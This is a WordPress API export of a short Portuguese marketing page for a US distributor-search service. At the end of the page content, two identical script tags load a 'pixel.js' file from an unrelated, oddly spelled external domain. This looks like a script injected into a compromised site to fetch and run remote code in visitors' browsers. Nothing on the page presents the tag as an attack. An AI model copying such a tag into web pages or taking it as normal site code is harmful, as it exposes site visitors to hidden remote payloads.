{"id":3145,"date":"2014-08-16T07:17:06","date_gmt":"2014-08-16T07:17:06","guid":{"rendered":"https:\/\/americanagent.com\/usa-distributor-search-2\/"},"modified":"2014-09-05T11:20:54","modified_gmt":"2014-09-05T15:20:54","slug":"pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/","title":{"rendered":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-cb17dc758b29addba0377d9c7dec58e4\">\n#top .av-special-heading.av-av_heading-cb17dc758b29addba0377d9c7dec58e4{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-cb17dc758b29addba0377d9c7dec58e4 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-cb17dc758b29addba0377d9c7dec58e4 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-cb17dc758b29addba0377d9c7dec58e4 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Pesquisar EUA distribuidores, importadores, revendedores e parceiros<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-2989cb1a500f76248ec894598f4e8e5e '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Talvez seja uma empresa com uma linha de produtos muito complexos e t\u00e9cnicos, ou talvez as suas actividades de p\u00f3s-venda precisam de mais apoio localizado &#8230; existem muitas raz\u00f5es pelas quais a parceria com conceituados distribuidores americanos, importadores, revendedores, grossistas, ou outro tipo de empresa, as opera\u00e7\u00f5es com mecanismos fortes de vendas e pessoal que compreende o seu mercado atribuido, por vezes, esta \u00e9 a \u00fanica maneira de entrar no mercado dos EUA.<\/p>\n<p>A empresa American Agent est\u00e1 idealmente posicionada para ajud\u00e1-lo. O nosso objectivo \u00e9 posicion\u00e1-lo o mais forte poss\u00edvel de frente de potenciais parceiros nos EUA, podemos estabelecer rela\u00e7\u00f5es comerciais duradouras entre si e respeit\u00e1veis empresas Americanas.<\/p>\n<p>A dura\u00e7\u00e3o do projeto pode variar dependendo da sua situa\u00e7\u00e3o espec\u00edfica.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3145","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pesquisar EUA distribuidores, importadores, revendedores e parceiros - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/\" \/>\n<meta property=\"og:locale\" content=\"pt_PT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pesquisar EUA distribuidores, importadores, revendedores e parceiros - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-05T15:20:54+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\\\/\",\"name\":\"Pesquisar EUA distribuidores, importadores, revendedores e parceiros - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:06+00:00\",\"dateModified\":\"2014-09-05T15:20:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\\\/#breadcrumb\"},\"inLanguage\":\"pt-PT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pesquisar EUA distribuidores, importadores, revendedores e parceiros\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-pt\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-PT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/","og_locale":"pt_PT","og_type":"article","og_title":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-05T15:20:54+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/","url":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/","name":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-pt\/#website"},"datePublished":"2014-08-16T07:17:06+00:00","dateModified":"2014-09-05T15:20:54+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/#breadcrumb"},"inLanguage":"pt-PT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-pt\/pesquisar-eua-distribuidores-importadores-revendedores-e-parceiros\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-pt\/"},{"@type":"ListItem","position":2,"name":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-pt\/#website","url":"https:\/\/americanagent.com\/pt-pt\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-pt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-PT"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages\/3145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/comments?post=3145"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/pages\/3145\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-pt\/wp-json\/wp\/v2\/media?parent=3145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}